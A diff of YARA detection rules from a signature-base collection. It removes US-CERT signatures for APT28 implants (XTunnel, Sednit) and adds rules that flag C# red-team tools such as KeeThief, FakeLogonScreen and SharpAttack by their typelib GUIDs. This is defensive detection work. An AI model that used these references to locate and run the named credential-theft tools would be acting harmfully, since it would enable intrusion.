-		$XMLDOM1 = {81 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60}
-		$XMLDOM2 = {90 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60}
-		$XMLPARSE = {8B 06 [0-2] 8D 55 ?C 52 FF 75 08 [0-2] 50 FF 91 04 01 00 00
-         66 83 7D ?C FF 75 3? 8B 06 [0-2] 8D 55 F? 52 50 [0-2] FF 51 30 85 C0
-         78 2?}
-		$EXP1 = "DispatchCommand"
-		$EXP2 = "DispatchEvent"
-		$BDATA = {85 C0 74 1? 0F B7 4? 06 83 C? 28 [0-6] 72 ?? 33 C0 5F 5E 5B 5D
-         C2 08 00 8B 4? 0? 8B 4? 0? 89 01 8B 4? 0C 03 [0-2] EB E?}
+		$typelibguid0lo = "0a63b0a1-7d1a-4b84-81c3-bbbfe9913029" ascii wide
+		$typelibguid0up = "0A63B0A1-7D1A-4B84-81C3-BBBFE9913029" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_5_V1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Keethief : FILE
 {
 	meta:
-		description = "XTunnel Implant by APT28"
-		author = "US CERT"
-		id = "dee08753-3465-5bf2-acd5-aa6cc80aba3c"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1034-L1051"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "71fef0e9-223a-5834-9d1c-f3fb8b66a809"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/GhostPack/KeeThief"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4023-L4046"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d94192d408036bf02052dc5145b78fea61323810b2abdbba64c65e1f6387ea42"
-		score = 85
+		logic_hash = "032f0453dc8e235b9326705c619929135cfc71840ab39669ae21c14b93568c75"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$hexstr = {2D 00 53 00 69 00 00 00 2D 00 53 00 70 00 00 00 2D 00 55 00
-         70 00 00 00 2D 00 50 00 69 00 00 00 2D 00 50 00 70 00 00 00}
-		$UDPMSG1 = "error 2005 recv from server UDP - %d\x0a"
-		$TPSMSG1 = "error 2004 send to TPS - %d\x0a"
-		$TPSMSG2 = "error 2003 recv from TPS - %d\x0a"
-		$UDPMSG2 = "error 2002 send to server UDP - %d\x0a"
+		$typelibguid1lo = "39aa6f93-a1c9-497f-bad2-cc42a61d5710" ascii wide
+		$typelibguid1up = "39AA6F93-A1C9-497F-BAD2-CC42A61D5710" ascii wide
+		$typelibguid3lo = "3fca8012-3bad-41e4-91f4-534aa9a44f96" ascii wide
+		$typelibguid3up = "3FCA8012-3BAD-41E4-91F4-534AA9A44F96" ascii wide
+		$typelibguid4lo = "ea92f1e6-3f34-48f8-8b0a-f2bbc19220ef" ascii wide
+		$typelibguid4up = "EA92F1E6-3F34-48F8-8B0A-F2BBC19220EF" ascii wide
+		$typelibguid5lo = "c23b51c4-2475-4fc6-9b3a-27d0a2b99b0f" ascii wide
+		$typelibguid5up = "C23B51C4-2475-4FC6-9B3A-27D0A2B99B0F" ascii wide
+		$typelibguid7lo = "80ba63a4-7d41-40e9-a722-6dd58b28bf7e" ascii wide
+		$typelibguid7up = "80BA63A4-7D41-40E9-A722-6DD58B28BF7E" ascii wide
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_5_V2
+rule SIGNATURE_BASE_HKTL_NET_GUID_Fakelogonscreen : FILE
 {
 	meta:
-		description = "XTunnel Implant by APT28"
-		author = "US CERT"
-		id = "40f60306-41ee-5a18-84e2-cf479a6bc849"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1053-L1192"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "cc20290c-3f34-5e81-9337-c582f1ee7ade"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/bitsadmin/fakelogonscreen"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4048-L4062"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "43e3df19ecd2068636b92c7a5c0399b22f8fa478e3e1562f392e78c5a268a1e5"
-		score = 85
-		quality = 60
-		tags = ""
+		logic_hash = "4f7f2c075860994b29a211b3cb30fa75b7b6e3ac60a68bbaa9ecf7e4467b4ed0"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$key0 = { 987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 }
-		$key1 = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 }
-		$key2 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 }
-		$key3 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 }
-		$key4 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 }
-		$key5 = { 34F1AE17017AF16021ADA5CE3F77675BBC6E7DEC6478D6078A0B22E5FDFF3B31 }
-		$key6 = { F0EA48F164395186E6F754256EBB812A2AFE168E77ED9501F8B8E6F5B72126A7 }
-		$key7 = { 0B6E9970A8EAF68EE14AB45005357A2F3391BEAA7E53AB760B916BC2B3916ABE }
-		$key8 = { FF032EA7ED2436CF6EEA1F741F99A3522A61FDA8B5A81EC03A8983ED1AEDAB1A }
-		$key9 = { F0DAC1DDFEF7AC6DE1CBE1006584538FE650389BF8565B32E0DE1FFACBCB14BB }
-		$key10 = { A5D699A3CD4510AF11F1AF767602055C523DF74B94527D74319D6EFC6883B80D }
-		$key11 = { 5951B02696C1D5A7B2851D28872384DA607B25F4CEA268FF3FD7FBA75AB3B4B3 }
-		$key12 = { 0465D99B26AF42D8346001BB838595E301BAD8CF5D40CE9C17C944717DF82481 }
-		$key13 = { 5DFE1C83AD5F5CE1BF5D9C42E23225E3ECFDB2493E80E6554A2AC7C722EB4880 }
-		$key14 = { E9650396C45F7783BC14C59F46EA8232E8357C26B5627BFF8C42C6AE2E0F2E17 }
-		$key15 = { 7432AE389125BB4E3980ED7F6A6FB252A42E785A90F4591C3620CA642FF97CA3 }
-		$key16 = { 2B2ADBBC4F960A8916F7088067BAD30BE84B65783FBF9476DF5FDA0E5856B183 }
-		$key17 = { 808C3FD0224A59384161B8A81C8BB404D7197D16D8118CB77067C5C8BD764B3E }
-		$key18 = { 028B0E24D5675C16C815BFE4A073E9778C668E65771A1CE881E2B03F58FC7D5B }
-		$key19 = { 878B7F5CF2DC72BAF1319F91A4880931EE979665B1B24D3394FE72EDFAEF4881 }
-		$key20 = { 7AC7DD6CA34F269481C526254D2F563BC6ECA1779FEEAA33EC1C20E60B686785 }
-		$key21 = { 3044F1D394186815DD8E3A2BBD9166837D07FA1CF6A550E2C170C9CDD9305209 }
-		$key22 = { 7544DC095C441E39D258648FE9CB1267D20D83C8B2D3AB734474401DA4932619 }
-		$key23 = { D702223347406C1999D1A9829CBBE96EC86D377A40E2EE84562EA1FAC1C71498 }
-		$key24 = { CA36CB1177382A1009D392A58F7C1357E94AD2292CC0AE82EE4F7DB0179148E1 }
-		$key25 = { C714F23E4C1C4E55F0E1FA7F5D0DD64658A86F84681D07576D840784154F65DC }
-		$key26 = { 63571BAF736904634AFEE2A70CB9ED64615DE8CA7AEF21E773286B8877D065DB }
-		$key27 = { 27808A9BE98FFE348DE1DB999AC9FDFB26E6C5A0D5E688490EF3D186C43661EB }
-		$key28 = { B6EB86A07A85D40866AFA100789FFB9E85C13F5AA7C7A3B6BA753C7EAB9D6A62 }
-		$key29 = { 88F0020375D60BDB85ACDBFE4BD79CD098DB2B3FA2CEF55D4331DBEFCE455157 }
-		$key30 = { 36535AAB296587AE1162AC5D39492DD1245811C72706246A38FF590645AA5D7B }
-		$key31 = { FDB726261CADD52E10818B49CAB81BEF112CB63832DAA26AD9FC711EA6CE99A4 }
-		$key32 = { 86C0CAA26D9FD07D215BC7EB14E2DA250E905D406AFFAB44FB1C62A2EAFC4670 }
-		$key33 = { BC101329B0E3A7D13F6EBC535097785E27D59E92D449D6D06538725034B8C0F0 }
-		$key34 = { C8D31A78B7C149F62F06497F9DC1DDC4967B566AC52C3A2A65AC7A99643B8A2D }
-		$key35 = { 0EA4A5C565EFBB94F5041392C5F0565B6BADC630D9005B3EADD5D81110623E1F }
-		$key36 = { 06E4E46BD3A0FFC8A4125A6A02B0C56D5D8B9E378CF97539CE4D4ADFAF89FEB5 }
-		$key37 = { 6DE22040821F0827316291331256A170E23FA76E381CA7066AF1E5197AE3CFE7 }
-		$key38 = { C6EF27480F2F6F40910074A45715143954BBA78CD74E92413F785BBA5B2AA121 }
-		$key39 = { 19C96A28F8D9698ADADD2E31F2426A46FD11D2D45F64169EDC7158389BFA59B4 }
-		$key40 = { C3C3DDBB9D4645772373A815B5125BB2232D8782919D206E0E79A6A973FF5D36 }
-		$key41 = { C33AF1608037D7A3AA7FB860911312B4409936D236564044CFE6ED42E54B78A8 }
-		$key42 = { 856A0806A1DFA94B5E62ABEF75BEA3B657D9888E30C8D2FFAEC042930BBA3C90 }
-		$key43 = { 244496C524401182A2BC72177A15CDD2EF55601F1D321ECBF2605FFD1B9B8E3F }
-		$key44 = { DF24050364168606D2F81E4D0DEB1FFC417F1B5EB13A2AA49A89A1B5242FF503 }
-		$key45 = { 54FA07B8108DBFE285DD2F92C84E8F09CDAA687FE492237F1BC4343FF4294248 }
-		$key46 = { 23490033D6BF165B9C45EE65947D6E6127D6E00C68038B83C8BFC2BCE905040C }
-		$key47 = { 4E044025C45680609B6EC52FEB3491130A711F7375AAF63D69B9F952BEFD5F0C }
-		$key48 = { 019F31C5F5B2269020EBC00C1F511F2AC23E9D37E89374514C6DA40A6A03176C }
-		$key49 = { A2483197FA57271B43E7276238468CFB8429326CBDA7BD091461147F642BEB06 }
-		$key50 = { 731C9D6E74C589B7ACB019E5F6A6E07ACF12E68CB9A396CE05AA4D69D5387048 }
-		$key51 = { 540DB6C8D23F7F7FEF9964E53F445F0E56459B10E931DEEEDB2B57B063C7F8B7 }
-		$key52 = { D5AF80A7EEFF26DE988AC3D7CE23E62568813551B2133F8D3E973DA15E355833 }
-		$key53 = { E4D8DBD3D801B1708C74485A972E7F00AFB45161C791EE05282BA68660FFBA45 }
-		$key54 = { D79518AF96C920223D687DD596FCD545B126A678B7947EDFBF24661F232064FB }
-		$key55 = { B57CAA4B45CA6E8332EB58C8E72D0D9853B3110B478FEA06B35026D7708AD225 }
-		$key56 = { 077C714C47DFCF79CA2742B1544F4AA8035BB34AEA9D519DEE77745E01468408 }
-		$key57 = { C3F5550AD424839E4CC54FA015994818F4FB62DE99B37C872AF0E52C376934FA }
-		$key58 = { 5E890432AE87D0FA4D209A62B9E37AAEDEDC8C779008FEBAF9E4E6304D1B2AAC }
-		$key59 = { A42EDE52B5AF4C02CFE76488CADE36A8BBC3204BCB1E05C402ECF450071EFCAB }
-		$key60 = { 4CDAFE02894A04583169E1FB4717A402DAC44DA6E2536AE53F5F35467D31F1CA }
-		$key61 = { 0BEFCC953AD0ED6B39CE6781E60B83C0CFD166B124D1966330CBA9ADFC9A7708 }
-		$key62 = { 8A439DC4148A2F4D5996CE3FA152FF702366224737B8AA6784531480ED8C8877 }
-		$key63 = { CF253BE3B06B310901FF48A351471374AD35BBE4EE654B72B860F2A6EC7B1DBB }
-		$key64 = { A0599F50C4D059C5CFA16821E97C9596B1517B9FB6C6116F260415127F32CE1F }
-		$key65 = { 8B6D704F3DC9150C6B7D2D54F9C3EAAB14654ACA2C5C3952604E65DF8133FE0C }
-		$key66 = { A06E5CDD3871E9A3EE17F7E8DAE193EE47DDB87339F2C599402A78C15D77CEFD }
-		$key67 = { E52ADA1D9BC4C089DBB771B59904A3E0E25B531B4D18B58E432D4FA0A41D9E8A }
-		$key68 = { 4778A7E23C686C171FDDCCB8E26F98C4CBEBDF180494A647C2F6E7661385F05B }
-		$key69 = { FE983D3A00A9521F871ED8698E702D595C0C7160A118A7630E8EC92114BA7C12 }
-		$key70 = { 52BA4C52639E71EABD49534BBA80A4168D15762E2D1D913BAB5A5DBF14D9D166 }
-		$key71 = { 931EB8F7BC2AE1797335C42DB56843427EB970ABD601E7825C4441701D13D7B1 }
-		$key72 = { 318FA8EDB989672DBE2B5A74949EB6125727BD2E28A4B084E8F1F50604CCB735 }
-		$key73 = { 5B5F2315E88A42A7B59C1B493AD15B92F819C021BD70A5A6619AAC6666639BC2 }
-		$key74 = { C2BED7AA481951FEB56C47F03EA38236BC425779B2FD1F1397CB79FE2E15C0F0 }
-		$key75 = { D3979B1CB0EC1A655961559704D7CDC019253ACB2259DFB92558B7536D774441 }
-		$key76 = { 0EDF5DBECB772424D879BBDD51899D6AAED736D0311589566D41A9DBB8ED1CC7 }
-		$key77 = { CC798598F0A9BCC82378A5740143DEAF1A147F4B2908A197494B7202388EC905 }
-		$key78 = { 074E9DF7F859BF1BD1658FD2A86D81C282000EAB09AF4252FAB45433421D3849 }
-		$key79 = { 6CD540642E007F00650ED20D7B54CFFD54DDA95D8DEBB087A004BAE222F22C8E }
-		$key80 = { C76CF2F66C71F6D17FC8DEFA1CAEF8718BA1CE188C7EA02C835A0FA54D3B3314 }
-		$key81 = { A7250A149600E515C9C40FE5720756FDA8251635A3B661261070CB5DABFE7253 }
-		$key82 = { 237C67B97D4CCE4610DE2B82E582808EA796C34A4C24715C953CBA403B2C935E }
-		$key83 = { A8FA182547E66B57C497DAAA195A38C0F0FB0A3C1F7B98B4B852F5F37E885127 }
-		$key84 = { 83694CCA50B821144FFBBE6855F62845F1328111AE1AC5666CBA59EB43AA12C6 }
-		$key85 = { 145E906416B17865AD37CD022DF5481F28C930D6E3F53C50B0953BF33F4DB953 }
-		$key86 = { AB49B7C2FA3027A767F5AA94EAF2B312BBE3E89FD924EF89B92A7CF977354C22 }
-		$key87 = { 7E04E478340C209B01CA2FEBBCE3FE77C6E6169F0B0528C42FA4BDA6D90AC957 }
-		$key88 = { 0EADD042B9F0DDBABA0CA676EFA4EDB68A045595097E5A392217DFFC21A8532F }
-		$key89 = { 5623710F134ECACD5B70434A1431009E3556343ED48E77F6A557F2C7FF46F655 }
-		$key90 = { 6968657DB62F4A119F8E5CB3BF5C51F4B285328613AA7DB9016F8000B576561F }
-		$key91 = { DEBB9C95EAE6A68974023C335F8D2711135A98260415DF05845F053AD65B59B4 }
-		$key92 = { 16F54900DBF08950F2C5835153AB636605FB8C09106C0E94CB13CEA16F275685 }
-		$key93 = { 1C9F86F88F0F4882D5CBD32876368E7B311A84418692D652A6A4F315CC499AE8 }
-		$key94 = { E920E0783028FA05F4CE2D6A04BBE636D56A775CFD4DAEA3F2A1B8BEEB52A6D4 }
-		$key95 = { 73874CA3AF47A8A315D50E1990F44F655EC7C15B146FFE0611B6C4FC096BD07C }
-		$key96 = { F21C1FA163C745789C53922C47E191A5A85301BDC2FFC3D3B688CFBFF39F3BE5 }
-		$key97 = { BC5A861F21CB98BD1E2AE9650B7A0BB4CD0C71900B3463C1BC3380AFD2BB948E }
-		$key98 = { 151BAE36E646F30570DC6A7B57752F2481A0B48DD5184E914BCF411D8AD5ACA0 }
-		$key99 = { F05AD6D7A0CADC10A6468BFDBCBB223D5BD6CA30EE19C239E8035772D80312C9 }
-		$key100 = { 5DE9A0FDB37C0D59C298577E5379BCAF4F86DF3E9FA17787A4CEFA7DD10C462E }
-		$key101 = { F5E62BA862380224D159A324D25FD321E5B35F8554D70CF9A506767713BCA508 }
-		$key102 = { A2D1B10409B328DA0CCBFFDE2AD2FF10855F95DA36A1D3DBA84952BB05F8C3A7 }
-		$key103 = { C974ABD227D3AD339FAC11C97E11D904706EDEA610B181B8FAD473FFCC36A695 }
-		$key104 = { AB5167D2241406C3C0178D3F28664398D5213EE5D2C09DCC9410CB604671F5F1 }
-		$key105 = { C25CC4E671CAAA31E137700A9DB3A272D4E157A6A1F47235043D954BAE8A3C70 }
-		$key106 = { E6005757CA0189AC38F9B6D5AD584881399F28DA949A0F98D8A4E3862E20F715 }
-		$key107 = { 204E6CEB4FF59787EF4D5C9CA5A41DDF4445B9D8E0C970B86D543E9C7435B194 }
-		$key108 = { 831D7FD21316590263B69E095ABBE89E01A176E16AE799D83BD774AF0D254390 }
-		$key109 = { 42C36355D9BC573D72F546CDB12E6BB2CFE2933AC92C12040386B310ABF6A1ED }
-		$key110 = { B9044393C09AD03390160041446BF3134D864D16B25F1AB5E5CDC690C4677E7D }
-		$key111 = { 6BC1102B5BE05EEBF65E2C3ACA1F4E17A59B2E57FB480DE016D371DA3AEF57A5 }
-		$key112 = { B068D00B482FF73F8D23795743C76FE8639D405EE54D3EFB20AFD55A9E2DFF4E }
-		$key113 = { 95CF5ADDFE511C8C7496E3B75D52A0C0EFE01ED52D5DD04D0CA6A7ABD3A6F968 }
-		$key114 = { 75534574A4620019F8E3D055367016255034FA7D91CBCA9E717149441742AC8D }
-		$key115 = { 96F1013A5301534BE424A11A94B740E5EB3A627D052D1B769E64BAB6A666433C }
-		$key116 = { 584477AB45CAF729EE9844834F84683ABECAB7C4F7D23A9636F54CDD5B8F19B3 }
-		$key117 = { D3905F185B564149EE85CC3D093477C8FF2F8CF601C68C38BBD81517672ECA3A }
-		$key118 = { BF29521A7F94636D1930AA236422EB6351775A523DE68AF9BF9F1026CEDA618D }
-		$key119 = { 04B3A783470AF1613A9B849FBD6F020EE65C612343EB1C028B2C28590789E60B }
-		$key120 = { 3D8D8E84977FE5D21B6971D8D873E7BED048E21333FE15BE2B3D1732C7FD3D04 }
-		$key121 = { 8ACB88224B6EF466D7653EB0D8256EA86D50BBA14FD05F7A0E77ACD574E9D9FF }
-		$key122 = { B46121FFCF1565A77AA45752C9C5FB3716B6D8658737DF95AE8B6A2374432228 }
-		$key123 = { A4432874588D1BD2317224FB371F324DD60AB25D4191F2F01C5C13909F35B943 }
-		$key124 = { 78E1B7D06ED2A2A044C69B7CE6CDC9BCD77C19180D0B082A671BBA06507349C8 }
-		$key125 = { 540198C3D33A631801FE94E7CB5DA3A2D9BCBAE7C7C3112EDECB342F3F7DF793 }
-		$key126 = { 7E905652CAB96ACBB7FEB2825B55243511DF1CD8A22D0680F83AAF37B8A7CB36 }
-		$key127 = { 37218801DBF2CD92F07F154CD53981E6189DBFBACAC53BC200EAFAB891C5EEC8 }
+		$typelibguid0lo = "d35a55bd-3189-498b-b72f-dc798172e505" ascii wide
+		$typelibguid0up = "D35A55BD-3189-498B-B72F-DC798172E505" ascii wide
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_5_V3
+rule SIGNATURE_BASE_HKTL_NET_GUID_Poshsecframework : FILE
 {
 	meta:
-		description = "XTunnel Implant by APT28"
-		author = "US CERT"
-		id = "0763e314-85d0-5c16-b766-36298176e0ff"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1194-L1207"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a91620f3-3f21-525a-bc87-94d21cd126be"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/PoshSec/PoshSecFramework"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4064-L4080"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aec1314858732d30b62a033e85eea50b3375e4f5b0e1818a941979d5be672297"
-		score = 85
+		logic_hash = "e0a35f5fc7a4c4ae8f09c7d4833faf55061984f9a7a920ec4219f04381f2053a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$BYTES1 = { 0F AF C0 6? C0 07 00 00 00 2D 01 00 00 00 0F AF ?? 39 ?8 }
-		$BYTES2 = { 0F AF C0 6? C0 07 48 0F AF ?? 39 ?8 }
+		$typelibguid0lo = "b1ac6aa0-2f1a-4696-bf4b-0e41cf2f4b6b" ascii wide
+		$typelibguid0up = "B1AC6AA0-2F1A-4696-BF4B-0E41CF2F4B6B" ascii wide
+		$typelibguid1lo = "78bfcfc2-ef1c-4514-bce6-934b251666d2" ascii wide
+		$typelibguid1up = "78BFCFC2-EF1C-4514-BCE6-934B251666D2" ascii wide
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_5_V4
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpattack : FILE
 {
 	meta:
-		description = "XTunnel Implant by APT28"
-		author = "US CERT"
-		id = "db6df7ea-f119-5e9a-bcea-c65580418042"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1209-L1225"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1eb911ab-3fb9-54b7-8afb-66328f30d563"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/jaredhaight/SharpAttack"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4082-L4096"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "98a08860453496d9629f62c64fed50a24b8378dcfa39b8b654610c2ac9084fa8"
-		score = 85
+		logic_hash = "2103b98f188d74c340d6ca71590be32c04cadba893882aebf4e22f5046ae4bc9"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$FBKEY1 = { 987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 }
-		$FBKEY2 = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 }
-		$FBKEY3 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 }
-		$FBKEY4 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 }
-		$FBKEY5 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 }
+		$typelibguid0lo = "5f0ceca3-5997-406c-adf5-6c7fbb6cba17" ascii wide
+		$typelibguid0up = "5F0CECA3-5997-406C-ADF5-6C7FBB6CBA17" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_6_V1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Altman : FILE
 {
 	meta:
-		description = "Sednit / EVILTOSS Implant by APT28"
-		author = "US CERT"
-		id = "0554ec8e-f45d-5afc-8874-dc8adfac5cdf"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1227-L1243"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "21acc8af-9497-5842-90a9-7a9300585d5d"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/keepwn/Altman"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4098-L4146"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c60402a029034545df302485c14e9485f806f2bc7d5fd759e84d1ecba9854837"
-		score = 85
-		quality = 85
+		logic_hash = "5ef32e351094f26bdaa87043b9ff202c25c67e6cd13935c3eb1ab7b4420b867c"
+		score = 75
+		quality = 83
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = "dll.dll" wide ascii
-		$STR2 = "Init1" wide ascii
-		$STR3 = "netui.dll" wide ascii
+		$typelibguid0lo = "64cdcd2b-7356-4079-af78-e22210e66154" ascii wide
+		$typelibguid0up = "64CDCD2B-7356-4079-AF78-E22210E66154" ascii wide
+		$typelibguid1lo = "f1dee29d-ca98-46ea-9d13-93ae1fda96e1" ascii wide
+		$typelibguid1up = "F1DEE29D-CA98-46EA-9D13-93AE1FDA96E1" ascii wide
+		$typelibguid2lo = "33568320-56e8-4abb-83f8-548e8d6adac2" ascii wide
+		$typelibguid2up = "33568320-56E8-4ABB-83F8-548E8D6ADAC2" ascii wide
+		$typelibguid3lo = "470ec930-70a3-4d71-b4ff-860fcb900e85" ascii wide
+		$typelibguid3up = "470EC930-70A3-4D71-B4FF-860FCB900E85" ascii wide
+		$typelibguid4lo = "9514574d-6819-44f2-affa-6158ac1143b3" ascii wide
+		$typelibguid4up = "9514574D-6819-44F2-AFFA-6158AC1143B3" ascii wide
+		$typelibguid5lo = "0f3a9c4f-0b11-4373-a0a6-3a6de814e891" ascii wide
+		$typelibguid5up = "0F3A9C4F-0B11-4373-A0A6-3A6DE814E891" ascii wide
+		$typelibguid6lo = "9624b72e-9702-4d78-995b-164254328151" ascii wide
+		$typelibguid6up = "9624B72E-9702-4D78-995B-164254328151" ascii wide
+		$typelibguid7lo = "faae59a8-55fc-48b1-a9b5-b1759c9c1010" ascii wide
+		$typelibguid7up = "FAAE59A8-55FC-48B1-A9B5-B1759C9C1010" ascii wide
+		$typelibguid8lo = "37af4988-f6f2-4f0c-aa2b-5b24f7ed3bf3" ascii wide
+		$typelibguid8up = "37AF4988-F6F2-4F0C-AA2B-5B24F7ED3BF3" ascii wide
+		$typelibguid9lo = "c82aa2fe-3332-441f-965e-6b653e088abf" ascii wide
+		$typelibguid9up = "C82AA2FE-3332-441F-965E-6B653E088ABF" ascii wide
+		$typelibguid10lo = "6e531f6c-2c89-447f-8464-aaa96dbcdfff" ascii wide
+		$typelibguid10up = "6E531F6C-2C89-447F-8464-AAA96DBCDFFF" ascii wide
+		$typelibguid11lo = "231987a1-ea32-4087-8963-2322338f16f6" ascii wide
+		$typelibguid11up = "231987A1-EA32-4087-8963-2322338F16F6" ascii wide
+		$typelibguid12lo = "7da0d93a-a0ae-41a5-9389-42eff85bb064" ascii wide
+		$typelibguid12up = "7DA0D93A-A0AE-41A5-9389-42EFF85BB064" ascii wide
+		$typelibguid13lo = "a729f9cc-edc2-4785-9a7d-7b81bb12484c" ascii wide
+		$typelibguid13up = "A729F9CC-EDC2-4785-9A7D-7B81BB12484C" ascii wide
+		$typelibguid14lo = "55a1fd43-d23e-4d72-aadb-bbd1340a6913" ascii wide
+		$typelibguid14up = "55A1FD43-D23E-4D72-AADB-BBD1340A6913" ascii wide
+		$typelibguid15lo = "d43f240d-e7f5-43c5-9b51-d156dc7ea221" ascii wide
+		$typelibguid15up = "D43F240D-E7F5-43C5-9B51-D156DC7EA221" ascii wide
+		$typelibguid16lo = "c2e6c1a0-93b1-4bbc-98e6-8e2b3145db8e" ascii wide
+		$typelibguid16up = "C2E6C1A0-93B1-4BBC-98E6-8E2B3145DB8E" ascii wide
